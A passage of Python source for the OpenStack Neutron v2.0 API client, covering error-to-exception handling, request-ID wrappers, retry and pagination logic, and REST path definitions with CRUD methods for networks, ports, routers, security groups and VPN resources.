# If Neutron key is found, it will definitely contain
# a 'message' and 'type' keys?
try:
error_type = error_dict['type']
error_message = error_dict['message']
if error_dict['detail']:
error_message += "\n" + error_dict['detail']
# If corresponding exception is defined, use it.
client_exc = getattr(exceptions, '%sClient' % error_type, None)
except Exception:
error_message = "%s" % error_dict
else:
error_message = None
if isinstance(error_content, dict):
error_message = error_content.get('message')
if not error_message:
# If we end up here the exception was not a neutron error
error_message = "%s-%s" % (status_code, error_content)
# If an exception corresponding to the error type is not found,
# look up per status-code client exception.
if not client_exc:
client_exc = exceptions.HTTP_EXCEPTION_MAP.get(status_code)
# If there is no exception per status-code,
# Use NeutronClientException as fallback.
if not client_exc:
client_exc = exceptions.NeutronClientException
raise client_exc(message=error_message,
status_code=status_code,
request_ids=request_ids)
class _RequestIdMixin(object):
"""Wrapper class to expose x-openstack-request-id to the caller."""
def _request_ids_setup(self):
self._request_ids = []
@property
def request_ids(self):
return self._request_ids
def _append_request_ids(self, resp):
"""Add request_ids as an attribute to the object
:param resp: Response object or list of Response objects
"""
if isinstance(resp, list):
# Add list of request_ids if response is of type list.
for resp_obj in resp:
self._append_request_id(resp_obj)
elif resp is not None:
# Add request_ids if response contains single object.
self._append_request_id(resp)
def _append_request_id(self, resp):
if isinstance(resp, requests.Response):
# Extract 'x-openstack-request-id' from headers if
# response is a Response object.
request_id = resp.headers.get('x-openstack-request-id')
else:
# If resp is of type string.
request_id = resp
if request_id:
self._request_ids.append(request_id)
class _DictWithMeta(dict, _RequestIdMixin):
def __init__(self, values, resp):
super(_DictWithMeta, self).__init__(values)
self._request_ids_setup()
self._append_request_ids(resp)
class _TupleWithMeta(tuple, _RequestIdMixin):
def __new__(cls, values, resp):
return super(_TupleWithMeta, cls).__new__(cls, values)
def __init__(self, values, resp):
self._request_ids_setup()
self._append_request_ids(resp)
class _StrWithMeta(str, _RequestIdMixin):
def __new__(cls, value, resp):
return super(_StrWithMeta, cls).__new__(cls, value)
def __init__(self, values, resp):
self._request_ids_setup()
self._append_request_ids(resp)
class _GeneratorWithMeta(_RequestIdMixin):
def __init__(self, paginate_func, collection, path, **params):
self.paginate_func = paginate_func
self.collection = collection
self.path = path
self.params = params
self.generator = None
self._request_ids_setup()
def _paginate(self):
for r in self.paginate_func(
self.collection, self.path, **self.params):
yield r, r.request_ids
def __iter__(self):
return self
# Python 3 compatibility
def __next__(self):
return self.next()
def next(self):
if not self.generator:
self.generator = self._paginate()
try:
obj, req_id = next(self.generator)
self._append_request_ids(req_id)
except StopIteration:
raise StopIteration()
return obj
class ClientBase(object):
"""Client for the OpenStack Neutron v2.0 API.
:param string username: Username for authentication. (optional)
:param string user_id: User ID for authentication. (optional)
:param string password: Password for authentication. (optional)
:param string token: Token for authentication. (optional)
:param string tenant_name: DEPRECATED! Use project_name instead.
:param string project_name: Project name. (optional)
:param string tenant_id: DEPRECATED! Use project_id instead.
:param string project_id: Project id. (optional)
:param string auth_strategy: 'keystone' by default, 'noauth' for no
authentication against keystone. (optional)
:param string auth_url: Keystone service endpoint for authorization.
:param string service_type: Network service type to pull from the
keystone catalog (e.g. 'network') (optional)
:param string endpoint_type: Network service endpoint type to pull from the
keystone catalog (e.g. 'publicURL',
'internalURL', or 'adminURL') (optional)
:param string region_name: Name of a region to select when choosing an
endpoint from the service catalog.
:param string endpoint_url: A user-supplied endpoint URL for the neutron
service. Lazy-authentication is possible for API
service calls if endpoint is set at
instantiation.(optional)
:param integer timeout: Allows customization of the timeout for client
http requests. (optional)
:param bool insecure: SSL certificate validation. (optional)
:param bool log_credentials: Allow for logging of passwords or not.
Defaults to False. (optional)
:param string ca_cert: SSL CA bundle file to use. (optional)
:param integer retries: How many times idempotent (GET, PUT, DELETE)
requests to Neutron server should be retried if
they fail (default: 0).
:param bool raise_errors: If True then exceptions caused by connection
failure are propagated to the caller.
(default: True)
:param session: Keystone client auth session to use. (optional)
:param auth: Keystone auth plugin to use. (optional)
Example::
from neutronclient.v2_0 import client
neutron = client.Client(username=USER,
password=PASS,
project_name=PROJECT_NAME,
auth_url=KEYSTONE_URL)
nets = neutron.list_networks()
...
"""
# API has no way to report plurals, so we have to hard code them
# This variable should be overridden by a child class.
EXTED_PLURALS = {}
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def __init__(self, **kwargs):
"""Initialize a new client for the Neutron v2.0 API."""
super(ClientBase, self).__init__()
self.retries = kwargs.pop('retries', 0)
self.raise_errors = kwargs.pop('raise_errors', True)
self.httpclient = client.construct_http_client(**kwargs)
self.version = '2.0'
self.action_prefix = "/v%s" % (self.version)
self.retry_interval = 1
def update_password(self, newpass):
self.httpclient.password = newpass
def _handle_fault_response(self, status_code, response_body, resp):
# Create exception with HTTP status code and message
_logger.debug("Error message: %s", response_body)
# Add deserialized error message to exception arguments
try:
des_error_body = self.deserialize(response_body, status_code)
except Exception:
# If unable to deserialized body it is probably not a
# Neutron error
des_error_body = {'message': response_body}
error_body = self._convert_into_with_meta(des_error_body, resp)
# Raise the appropriate exception
exception_handler_v20(status_code, error_body)
def do_request(self, method, action, body=None, headers=None, params=None):
# Add format and project_id
action = self.action_prefix + action
if isinstance(params, dict) and params:
params = utils.safe_encode_dict(params)
action += '?' + urlparse.urlencode(params, doseq=1)
if body:
body = self.serialize(body)
resp, replybody = self.httpclient.do_request(action, method, body=body)
status_code = resp.status_code
if status_code in (requests.codes.ok,
requests.codes.created,
requests.codes.accepted,
requests.codes.no_content):
data = self.deserialize(replybody, status_code)
return self._convert_into_with_meta(data, resp)
else:
if not replybody:
replybody = resp.reason
self._handle_fault_response(status_code, replybody, resp)
def get_auth_info(self):
return self.httpclient.get_auth_info()
def serialize(self, data):
"""Serializes a dictionary into JSON.
A dictionary with a single key can be passed and it can contain any
structure.
"""
if data is None:
return None
elif isinstance(data, dict):
return serializer.Serializer().serialize(data)
else:
raise Exception(_("Unable to serialize object of type = '%s'") %
type(data))
def deserialize(self, data, status_code):
"""Deserializes a JSON string into a dictionary."""
if not data:
return data
return serializer.Serializer().deserialize(
data)['body']
def retry_request(self, method, action, body=None,
headers=None, params=None):
"""Call do_request with the default retry configuration.
Only idempotent requests should retry failed connection attempts.
:raises: ConnectionFailed if the maximum # of retries is exceeded
"""
max_attempts = self.retries + 1
for i in range(max_attempts):
try:
return self.do_request(method, action, body=body,
headers=headers, params=params)
except (exceptions.ConnectionFailed, ksa_exc.ConnectionError):
# Exception has already been logged by do_request()
if i < self.retries:
_logger.debug('Retrying connection to Neutron service')
time.sleep(self.retry_interval)
elif self.raise_errors:
raise
if self.retries:
msg = (_("Failed to connect to Neutron server after %d attempts")
% max_attempts)
else:
msg = _("Failed to connect Neutron server")
raise exceptions.ConnectionFailed(reason=msg)
def delete(self, action, body=None, headers=None, params=None):
return self.retry_request("DELETE", action, body=body,
headers=headers, params=params)
def get(self, action, body=None, headers=None, params=None):
return self.retry_request("GET", action, body=body,
headers=headers, params=params)
def post(self, action, body=None, headers=None, params=None):
# Do not retry POST requests to avoid the orphan objects problem.
return self.do_request("POST", action, body=body,
headers=headers, params=params)
def put(self, action, body=None, headers=None, params=None):
return self.retry_request("PUT", action, body=body,
headers=headers, params=params)
def list(self, collection, path, retrieve_all=True, **params):
if retrieve_all:
res = []
request_ids = []
for r in self._pagination(collection, path, **params):
res.extend(r[collection])
request_ids.extend(r.request_ids)
return _DictWithMeta({collection: res}, request_ids)
else:
return _GeneratorWithMeta(self._pagination, collection,
path, **params)
def _pagination(self, collection, path, **params):
if params.get('page_reverse', False):
linkrel = 'previous'
else:
linkrel = 'next'
next = True
while next:
res = self.get(path, params=params)
yield res
next = False
try:
for link in res['%s_links' % collection]:
if link['rel'] == linkrel:
query_str = urlparse.urlparse(link['href']).query
params = urlparse.parse_qs(query_str)
next = True
break
except KeyError:
break
def _convert_into_with_meta(self, item, resp):
if item:
if isinstance(item, dict):
return _DictWithMeta(item, resp)
elif isinstance(item, string_types):
return _StrWithMeta(item, resp)
else:
return _TupleWithMeta((), resp)
def get_resource_plural(self, resource):
for k in self.EXTED_PLURALS:
if self.EXTED_PLURALS[k] == resource:
return k
return resource + 's'
def find_resource_by_id(self, resource, resource_id, cmd_resource=None,
parent_id=None, fields=None):
if not cmd_resource:
cmd_resource = resource
cmd_resource_plural = self.get_resource_plural(cmd_resource)
resource_plural = self.get_resource_plural(resource)
# TODO(amotoki): Use show_%s instead of list_%s
obj_lister = getattr(self, "list_%s" % cmd_resource_plural)
# perform search by id only if we are passing a valid UUID
match = re.match(UUID_PATTERN, resource_id)
collection = resource_plural
if match:
params = {'id': resource_id}
if fields:
params['fields'] = fields
if parent_id:
data = obj_lister(parent_id, **params)
else:
data = obj_lister(**params)
if data and data[collection]:
return data[collection][0]
not_found_message = (_("Unable to find %(resource)s with id "
"'%(id)s'") %
{'resource': resource, 'id': resource_id})
# 404 is raised by exceptions.NotFound to simulate serverside behavior
raise exceptions.NotFound(message=not_found_message)
def _find_resource_by_name(self, resource, name, project_id=None,
cmd_resource=None, parent_id=None, fields=None):
if not cmd_resource:
cmd_resource = resource
cmd_resource_plural = self.get_resource_plural(cmd_resource)
resource_plural = self.get_resource_plural(resource)
obj_lister = getattr(self, "list_%s" % cmd_resource_plural)
params = {'name': name}
if fields:
params['fields'] = fields
if project_id:
params['tenant_id'] = project_id
if parent_id:
data = obj_lister(parent_id, **params)
else:
data = obj_lister(**params)
collection = resource_plural
info = data[collection]
if len(info) > 1:
raise exceptions.NeutronClientNoUniqueMatch(resource=resource,
name=name)
elif len(info) == 0:
not_found_message = (_("Unable to find %(resource)s with name "
"'%(name)s'") %
{'resource': resource, 'name': name})
# 404 is raised by exceptions.NotFound
# to simulate serverside behavior
raise exceptions.NotFound(message=not_found_message)
else:
return info[0]
def find_resource(self, resource, name_or_id, project_id=None,
cmd_resource=None, parent_id=None, fields=None):
try:
return self.find_resource_by_id(resource, name_or_id,
cmd_resource, parent_id, fields)
except exceptions.NotFound:
try:
return self._find_resource_by_name(
resource, name_or_id, project_id,
cmd_resource, parent_id, fields)
except exceptions.NotFound:
not_found_message = (_("Unable to find %(resource)s with name "
"or id '%(name_or_id)s'") %
{'resource': resource,
'name_or_id': name_or_id})
raise exceptions.NotFound(
message=not_found_message)
class Client(ClientBase):
networks_path = "/networks"
network_path = "/networks/%s"
ports_path = "/ports"
port_path = "/ports/%s"
qos_path = "/wrs-tm/qoses"
qoses_path = "/wrs-tm/qoses/%s"
subnets_path = "/subnets"
subnet_path = "/subnets/%s"
subnetpools_path = "/subnetpools"
subnetpool_path = "/subnetpools/%s"
address_scopes_path = "/address-scopes"
address_scope_path = "/address-scopes/%s"
quotas_path = "/quotas"
quota_path = "/quotas/%s"
quota_default_path = "/quotas/%s/default"
quota_details_path = "/quotas/%s/details.json"
settings_path = "/wrs-tenant/settings"
setting_path = "/wrs-tenant/settings/%s"
extensions_path = "/extensions"
extension_path = "/extensions/%s"
routers_path = "/routers"
router_path = "/routers/%s"
floatingips_path = "/floatingips"
floatingip_path = "/floatingips/%s"
security_groups_path = "/security-groups"
security_group_path = "/security-groups/%s"
security_group_rules_path = "/security-group-rules"
security_group_rule_path = "/security-group-rules/%s"
sfc_flow_classifiers_path = "/sfc/flow_classifiers"
sfc_flow_classifier_path = "/sfc/flow_classifiers/%s"
sfc_port_pairs_path = "/sfc/port_pairs"
sfc_port_pair_path = "/sfc/port_pairs/%s"
sfc_port_pair_groups_path = "/sfc/port_pair_groups"
sfc_port_pair_group_path = "/sfc/port_pair_groups/%s"
sfc_port_chains_path = "/sfc/port_chains"
sfc_port_chain_path = "/sfc/port_chains/%s"
endpoint_groups_path = "/vpn/endpoint-groups"
endpoint_group_path = "/vpn/endpoint-groups/%s"
vpnservices_path = "/vpn/vpnservices"
vpnservice_path = "/vpn/vpnservices/%s"
ipsecpolicies_path = "/vpn/ipsecpolicies"
ipsecpolicy_path = "/vpn/ipsecpolicies/%s"
ikepolicies_path = "/vpn/ikepolicies"
ikepolicy_path = "/vpn/ikepolicies/%s"
ipsec_site_connections_path = "/vpn/ipsec-site-connections"
ipsec_site_connection_path = "/vpn/ipsec-site-connections/%s"
lbaas_loadbalancers_path = "/lbaas/loadbalancers"
lbaas_loadbalancer_path = "/lbaas/loadbalancers/%s"
lbaas_loadbalancer_path_stats = "/lbaas/loadbalancers/%s/stats"
lbaas_loadbalancer_path_status = "/lbaas/loadbalancers/%s/statuses"
lbaas_listeners_path = "/lbaas/listeners"
lbaas_listener_path = "/lbaas/listeners/%s"
lbaas_l7policies_path = "/lbaas/l7policies"
lbaas_l7policy_path = lbaas_l7policies_path + "/%s"
lbaas_l7rules_path = lbaas_l7policy_path + "/rules"
lbaas_l7rule_path = lbaas_l7rules_path + "/%s"
lbaas_pools_path = "/lbaas/pools"
lbaas_pool_path = "/lbaas/pools/%s"
lbaas_healthmonitors_path = "/lbaas/healthmonitors"
lbaas_healthmonitor_path = "/lbaas/healthmonitors/%s"
lbaas_members_path = lbaas_pool_path + "/members"
lbaas_member_path = lbaas_pool_path + "/members/%s"
vips_path = "/lb/vips"
vip_path = "/lb/vips/%s"
pools_path = "/lb/pools"
pool_path = "/lb/pools/%s"
pool_path_stats = "/lb/pools/%s/stats"
members_path = "/lb/members"
member_path = "/lb/members/%s"
health_monitors_path = "/lb/health_monitors"
health_monitor_path = "/lb/health_monitors/%s"
associate_pool_health_monitors_path = "/lb/pools/%s/health_monitors"
disassociate_pool_health_monitors_path = (
"/lb/pools/%(pool)s/health_monitors/%(health_monitor)s")
qos_queues_path = "/qos-queues"
qos_queue_path = "/qos-queues/%s"
agents_path = "/agents"
agent_path = "/agents/%s"
hosts_path = "/hosts"
host_path = "/hosts/%s"
host_bind_path = "/hosts/%s/bind_interface"
host_unbind_path = "/hosts/%s/unbind_interface"
network_gateways_path = "/network-gateways"
network_gateway_path = "/network-gateways/%s"
gateway_devices_path = "/gateway-devices"
gateway_device_path = "/gateway-devices/%s"
service_providers_path = "/service-providers"
metering_labels_path = "/metering/metering-labels"
metering_label_path = "/metering/metering-labels/%s"
metering_label_rules_path = "/metering/metering-label-rules"
metering_label_rule_path = "/metering/metering-label-rules/%s"
DHCP_NETS = '/dhcp-networks'
DHCP_AGENTS = '/dhcp-agents'
L3_ROUTERS = '/l3-routers'
L3_AGENTS = '/l3-agents'
LOADBALANCER_POOLS = '/loadbalancer-pools'
LOADBALANCER_AGENT = '/loadbalancer-agent'
AGENT_LOADBALANCERS = '/agent-loadbalancers'
LOADBALANCER_HOSTING_AGENT = '/loadbalancer-hosting-agent'
firewall_rules_path = "/fw/firewall_rules"
firewall_rule_path = "/fw/firewall_rules/%s"
firewall_policies_path = "/fw/firewall_policies"
firewall_policy_path = "/fw/firewall_policies/%s"
firewall_policy_insert_path = "/fw/firewall_policies/%s/insert_rule"
firewall_policy_remove_path = "/fw/firewall_policies/%s/remove_rule"
firewalls_path = "/fw/firewalls"
firewall_path = "/fw/firewalls/%s"
fwaas_firewall_groups_path = "/fwaas/firewall_groups"
fwaas_firewall_group_path = "/fwaas/firewall_groups/%s"
fwaas_firewall_rules_path = "/fwaas/firewall_rules"
fwaas_firewall_rule_path = "/fwaas/firewall_rules/%s"
fwaas_firewall_policies_path = "/fwaas/firewall_policies"
fwaas_firewall_policy_path = "/fwaas/firewall_policies/%s"
fwaas_firewall_policy_insert_path = \
"/fwaas/firewall_policies/%s/insert_rule"
fwaas_firewall_policy_remove_path = \
"/fwaas/firewall_policies/%s/remove_rule"
rbac_policies_path = "/rbac-policies"
rbac_policy_path = "/rbac-policies/%s"
qos_policies_path = "/qos/policies"
qos_policy_path = "/qos/policies/%s"
qos_bandwidth_limit_rules_path = "/qos/policies/%s/bandwidth_limit_rules"
qos_bandwidth_limit_rule_path = "/qos/policies/%s/bandwidth_limit_rules/%s"
qos_dscp_marking_rules_path = "/qos/policies/%s/dscp_marking_rules"
qos_dscp_marking_rule_path = "/qos/policies/%s/dscp_marking_rules/%s"
qos_minimum_bandwidth_rules_path = \
"/qos/policies/%s/minimum_bandwidth_rules"
qos_minimum_bandwidth_rule_path = \
"/qos/policies/%s/minimum_bandwidth_rules/%s"
qos_rule_types_path = "/qos/rule-types"
qos_rule_type_path = "/qos/rule-types/%s"
flavors_path = "/flavors"
flavor_path = "/flavors/%s"
service_profiles_path = "/service_profiles"
service_profile_path = "/service_profiles/%s"
flavor_profile_bindings_path = flavor_path + service_profiles_path
flavor_profile_binding_path = flavor_path + service_profile_path
availability_zones_path = "/availability_zones"
auto_allocated_topology_path = "/auto-allocated-topology/%s"
BGP_DRINSTANCES = "/bgp-drinstances"
BGP_DRINSTANCE = "/bgp-drinstance/%s"
BGP_DRAGENTS = "/bgp-dragents"
BGP_DRAGENT = "/bgp-dragents/%s"
bgp_speakers_path = "/bgp-speakers"
bgp_speaker_path = "/bgp-speakers/%s"
bgp_peers_path = "/bgp-peers"
bgp_peer_path = "/bgp-peers/%s"
network_ip_availabilities_path = '/network-ip-availabilities'
network_ip_availability_path = '/network-ip-availabilities/%s'
tags_path = "/%s/%s/tags"
tag_path = "/%s/%s/tags/%s"
trunks_path = "/trunks"
trunk_path = "/trunks/%s"
subports_path = "/trunks/%s/get_subports"
subports_add_path = "/trunks/%s/add_subports"
subports_remove_path = "/trunks/%s/remove_subports"
bgpvpns_path = "/bgpvpn/bgpvpns"
bgpvpn_path = "/bgpvpn/bgpvpns/%s"
bgpvpn_network_associations_path =\
"/bgpvpn/bgpvpns/%s/network_associations"
bgpvpn_network_association_path =\
"/bgpvpn/bgpvpns/%s/network_associations/%s"
bgpvpn_router_associations_path = "/bgpvpn/bgpvpns/%s/router_associations"
bgpvpn_router_association_path =\
"/bgpvpn/bgpvpns/%s/router_associations/%s"
providernet_types_path = "/wrs-provider/providernet-types"
providernets_path = "/wrs-provider/providernets"
providernet_path = "/wrs-provider/providernets/%s"
providernet_ranges_path = "/wrs-provider/providernet-ranges"
providernet_range_path = "/wrs-provider/providernet-ranges/%s"
PNET_BINDINGS = "/providernet-bindings"
portforwardings_path = "/portforwardings"
portforwarding_path = "/portforwardings/%s"
providernet_connectivity_tests_path = \
"/wrs-provider/providernet-connectivity-tests"
# API has no way to report plurals, so we have to hard code them
EXTED_PLURALS = {'routers': 'router',
'floatingips': 'floatingip',
'service_types': 'service_type',
'service_definitions': 'service_definition',
'security_groups': 'security_group',
'security_group_rules': 'security_group_rule',
'ipsecpolicies': 'ipsecpolicy',
'ikepolicies': 'ikepolicy',
'ipsec_site_connections': 'ipsec_site_connection',
'vpnservices': 'vpnservice',
'endpoint_groups': 'endpoint_group',
'vips': 'vip',
'pools': 'pool',
'providernet_types': 'providernet_type',
'providernets': 'providernet',
'providernet_ranges': 'providernet_range',
'members': 'member',
'health_monitors': 'health_monitor',
'quotas': 'quota',
'qoses': 'qos',
'service_providers': 'service_provider',
'firewall_rules': 'firewall_rule',
'firewall_policies': 'firewall_policy',
'firewalls': 'firewall',
'fwaas_firewall_rules': 'fwaas_firewall_rule',
'fwaas_firewall_policies': 'fwaas_firewall_policy',
'fwaas_firewall_groups': 'fwaas_firewall_group',
'metering_labels': 'metering_label',
'metering_label_rules': 'metering_label_rule',
'loadbalancers': 'loadbalancer',
'listeners': 'listener',
'l7rules': 'l7rule',
'l7policies': 'l7policy',
'lbaas_l7policies': 'lbaas_l7policy',
'lbaas_pools': 'lbaas_pool',
'lbaas_healthmonitors': 'lbaas_healthmonitor',
'lbaas_members': 'lbaas_member',
'healthmonitors': 'healthmonitor',
'rbac_policies': 'rbac_policy',
'address_scopes': 'address_scope',
'qos_policies': 'qos_policy',
'policies': 'policy',
'bandwidth_limit_rules': 'bandwidth_limit_rule',
'minimum_bandwidth_rules': 'minimum_bandwidth_rule',
'rules': 'rule',
'dscp_marking_rules': 'dscp_marking_rule',
'rule_types': 'rule_type',
'flavors': 'flavor',
'bgp_speakers': 'bgp_speaker',
'bgp_peers': 'bgp_peer',
'network_ip_availabilities': 'network_ip_availability',
'trunks': 'trunk',
'bgpvpns': 'bgpvpn',
'network_associations': 'network_association',
'router_associations': 'router_association',
'flow_classifiers': 'flow_classifier',
'port_pairs': 'port_pair',
'port_pair_groups': 'port_pair_group',
'port_chains': 'port_chain',
'portforwardings': 'portforwarding',
}
def list_ext(self, collection, path, retrieve_all, **_params):
"""Client extension hook for list."""
return self.list(collection, path, retrieve_all, **_params)
def show_ext(self, path, id, **_params):
"""Client extension hook for show."""
return self.get(path % id, params=_params)
def create_ext(self, path, body=None):
"""Client extension hook for create."""
return self.post(path, body=body)
def update_ext(self, path, id, body=None):
"""Client extension hook for update."""
return self.put(path % id, body=body)
def delete_ext(self, path, id):
"""Client extension hook for delete."""
return self.delete(path % id)
def get_quotas_tenant(self, **_params):
"""Fetch project info for following quota operation."""
return self.get(self.quota_path % 'tenant', params=_params)
def list_quotas(self, **_params):
"""Fetch all projects' quotas."""
return self.get(self.quotas_path, params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def show_quota(self, project_id, **_params):
"""Fetch information of a certain project's quotas."""
return self.get(self.quota_path % (project_id), params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def show_quota_details(self, project_id, **_params):
"""Fetch information of a certain project's quotas."""
return self.get(self.quota_details_path % (project_id),
params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def show_quota_default(self, project_id, **_params):
"""Fetch information of a certain project's default quotas."""
return self.get(self.quota_default_path % (project_id), params=_params)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def update_quota(self, project_id, body=None):
"""Update a project's quotas."""
return self.put(self.quota_path % (project_id), body=body)
@debtcollector.renames.renamed_kwarg(
'tenant_id', 'project_id', replace=True)
def delete_quota(self, project_id):
"""Delete the specified project's quota values."""
return self.delete(self.quota_path % (project_id))
def get_settings_tenant(self, **_params):
"""Fetch tenant info for following setting operation. """
return self.get(self.setting_path % 'tenant', params=_params)
def list_settings(self, **_params):
"""Fetch all tenants' settings."""
return self.get(self.settings_path, params=_params)
def show_setting(self, tenant_id, **_params):
"""Fetch information of a certain tenant's settings."""
return self.get(self.setting_path % (tenant_id), params=_params)
def update_setting(self, tenant_id, body=None):
"""Update a tenant's settings."""
return self.put(self.setting_path % (tenant_id), body=body)
def delete_setting(self, tenant_id):
"""Delete the specified tenant's setting values."""
return self.delete(self.setting_path % (tenant_id))
def list_extensions(self, **_params):
"""Fetch a list of all extensions on server side."""
return self.get(self.extensions_path, params=_params)
def show_extension(self, ext_alias, **_params):
"""Fetches information of a certain extension."""
return self.get(self.extension_path % ext_alias, params=_params)
def list_ports(self, retrieve_all=True, **_params):
"""Fetches a list of all ports for a project."""
# Pass filters in "params" argument to do_request
return self.list('ports', self.ports_path, retrieve_all,
**_params)
def show_port(self, port, **_params):
"""Fetches information of a certain port."""
return self.get(self.port_path % (port), params=_params)
def create_port(self, body=None):
"""Creates a new port."""
return self.post(self.ports_path, body=body)
def update_port(self, port, body=None):
"""Updates a port."""
return self.put(self.port_path % (port), body=body)
def delete_port(self, port):
"""Deletes the specified port."""
return self.delete(self.port_path % (port))
def list_networks(self, retrieve_all=True, **_params):
"""Fetches a list of all networks for a project."""
# Pass filters in "params" argument to do_request
return self.list('networks', self.networks_path, retrieve_all,
**_params)
def show_network(self, network, **_params):
"""Fetches information of a certain network."""
return self.get(self.network_path % (network), params=_params)
def create_network(self, body=None):
"""Creates a new network."""
return self.post(self.networks_path, body=body)
def update_network(self, network, body=None):
"""Updates a network."""
return self.put(self.network_path % (network), body=body)
def delete_network(self, network):
"""Deletes the specified network."""
return self.delete(self.network_path % (network))
def list_subnets(self, retrieve_all=True, **_params):
"""Fetches a list of all subnets for a project."""
return self.list('subnets', self.subnets_path, retrieve_all,
**_params)
def show_subnet(self, subnet, **_params):
"""Fetches information of a certain subnet."""
return self.get(self.subnet_path % (subnet), params=_params)
def create_subnet(self, body=None):
"""Creates a new subnet."""
return self.post(self.subnets_path, body=body)
def update_subnet(self, subnet, body=None):
"""Updates a subnet."""
return self.put(self.subnet_path % (subnet), body=body)
def delete_subnet(self, subnet):
"""Deletes the specified subnet."""
return self.delete(self.subnet_path % (subnet))
def list_subnetpools(self, retrieve_all=True, **_params):
"""Fetches a list of all subnetpools for a project."""
return self.list('subnetpools', self.subnetpools_path, retrieve_all,
**_params)
def show_subnetpool(self, subnetpool, **_params):
"""Fetches information of a certain subnetpool."""
return self.get(self.subnetpool_path % (subnetpool), params=_params)
def create_subnetpool(self, body=None):
"""Creates a new subnetpool."""
return self.post(self.subnetpools_path, body=body)
def update_subnetpool(self, subnetpool, body=None):
"""Updates a subnetpool."""
return self.put(self.subnetpool_path % (subnetpool), body=body)
def delete_subnetpool(self, subnetpool):
"""Deletes the specified subnetpool."""
return self.delete(self.subnetpool_path % (subnetpool))
def list_routers(self, retrieve_all=True, **_params):
"""Fetches a list of all routers for a project."""
# Pass filters in "params" argument to do_request
return self.list('routers', self.routers_path, retrieve_all,
**_params)
def show_router(self, router, **_params):
"""Fetches information of a certain router."""
return self.get(self.router_path % (router), params=_params)
def create_router(self, body=None):
"""Creates a new router."""
return self.post(self.routers_path, body=body)
def update_router(self, router, body=None):
"""Updates a router."""
return self.put(self.router_path % (router), body=body)
def delete_router(self, router):
"""Deletes the specified router."""
return self.delete(self.router_path % (router))
def list_address_scopes(self, retrieve_all=True, **_params):
"""Fetches a list of all address scopes for a project."""
return self.list('address_scopes', self.address_scopes_path,
retrieve_all, **_params)
def show_address_scope(self, address_scope, **_params):
"""Fetches information of a certain address scope."""
return self.get(self.address_scope_path % (address_scope),
params=_params)
def create_address_scope(self, body=None):
"""Creates a new address scope."""
return self.post(self.address_scopes_path, body=body)
def update_address_scope(self, address_scope, body=None):
"""Updates a address scope."""
return self.put(self.address_scope_path % (address_scope), body=body)
def delete_address_scope(self, address_scope):
"""Deletes the specified address scope."""
return self.delete(self.address_scope_path % (address_scope))
def add_interface_router(self, router, body=None):
"""Adds an internal network interface to the specified router."""
return self.put((self.router_path % router) + "/add_router_interface",
body=body)
def remove_interface_router(self, router, body=None):
"""Removes an internal network interface from the specified router."""
return self.put((self.router_path % router) +
"/remove_router_interface", body=body)
def add_gateway_router(self, router, body=None):
"""Adds an external network gateway to the specified router."""
return self.put((self.router_path % router),
body={'router': {'external_gateway_info': body}})
def remove_gateway_router(self, router):
"""Removes an external network gateway from the specified router."""
return self.put((self.router_path % router),
body={'router': {'external_gateway_info': {}}})
def list_floatingips(self, retrieve_all=True, **_params):
"""Fetches a list of all floatingips for a project."""
# Pass filters in "params" argument to do_request
return self.list('floatingips', self.floatingips_path, retrieve_all,
**_params)
def show_floatingip(self, floatingip, **_params):
"""Fetches information of a certain floatingip."""
return self.get(self.floatingip_path % (floatingip), params=_params)
def create_floatingip(self, body=None):
"""Creates a new floatingip."""
return self.post(self.floatingips_path, body=body)
def update_floatingip(self, floatingip, body=None):
"""Updates a floatingip."""
return self.put(self.floatingip_path % (floatingip), body=body)
def delete_floatingip(self, floatingip):
"""Deletes the specified floatingip."""
return self.delete(self.floatingip_path % (floatingip))
def create_security_group(self, body=None):
"""Creates a new security group."""
return self.post(self.security_groups_path, body=body)
def update_security_group(self, security_group, body=None):
"""Updates a security group."""
return self.put(self.security_group_path %
security_group, body=body)
def list_security_groups(self, retrieve_all=True, **_params):
"""Fetches a list of all security groups for a project."""
return self.list('security_groups', self.security_groups_path,
retrieve_all, **_params)
def show_security_group(self, security_group, **_params):
"""Fetches information of a certain security group."""
return self.get(self.security_group_path % (security_group),
params=_params)
def delete_security_group(self, security_group):
"""Deletes the specified security group."""
return self.delete(self.security_group_path % (security_group))
def create_security_group_rule(self, body=None):
"""Creates a new security group rule."""
return self.post(self.security_group_rules_path, body=body)
def delete_security_group_rule(self, security_group_rule):
"""Deletes the specified security group rule."""
return self.delete(self.security_group_rule_path %
(security_group_rule))
def list_security_group_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all security group rules for a project."""
return self.list('security_group_rules',
self.security_group_rules_path,
retrieve_all, **_params)
def show_security_group_rule(self, security_group_rule, **_params):
"""Fetches information of a certain security group rule."""
return self.get(self.security_group_rule_path % (security_group_rule),
params=_params)
def list_endpoint_groups(self, retrieve_all=True, **_params):
"""Fetches a list of all VPN endpoint groups for a project."""
return self.list('endpoint_groups', self.endpoint_groups_path,
retrieve_all, **_params)
def show_endpoint_group(self, endpointgroup, **_params):
"""Fetches information for a specific VPN endpoint group."""
return self.get(self.endpoint_group_path % endpointgroup,
params=_params)
def create_endpoint_group(self, body=None):
"""Creates a new VPN endpoint group."""
return self.post(self.endpoint_groups_path, body=body)
def update_endpoint_group(self, endpoint_group, body=None):
"""Updates a VPN endpoint group."""
return self.put(self.endpoint_group_path % endpoint_group, body=body)
def delete_endpoint_group(self, endpoint_group):
"""Deletes the specified VPN endpoint group."""
return self.delete(self.endpoint_group_path % endpoint_group)
def list_vpnservices(self, retrieve_all=True, **_params):
"""Fetches a list of all configured VPN services for a project."""
return self.list('vpnservices', self.vpnservices_path, retrieve_all,
**_params)
def show_vpnservice(self, vpnservice, **_params):
"""Fetches information of a specific VPN service."""
return self.get(self.vpnservice_path % (vpnservice), params=_params)
def create_vpnservice(self, body=None):
"""Creates a new VPN service."""
return self.post(self.vpnservices_path, body=body)
def update_vpnservice(self, vpnservice, body=None):
"""Updates a VPN service."""
return self.put(self.vpnservice_path % (vpnservice), body=body)
def delete_vpnservice(self, vpnservice):
"""Deletes the specified VPN service."""
return self.delete(self.vpnservice_path % (vpnservice))
def list_ipsec_site_connections(self, retrieve_all=True, **_params):
"""Fetches all configured IPsecSiteConnections for a project."""
return self.list('ipsec_site_connections',
self.ipsec_site_connections_path,
retrieve_all,
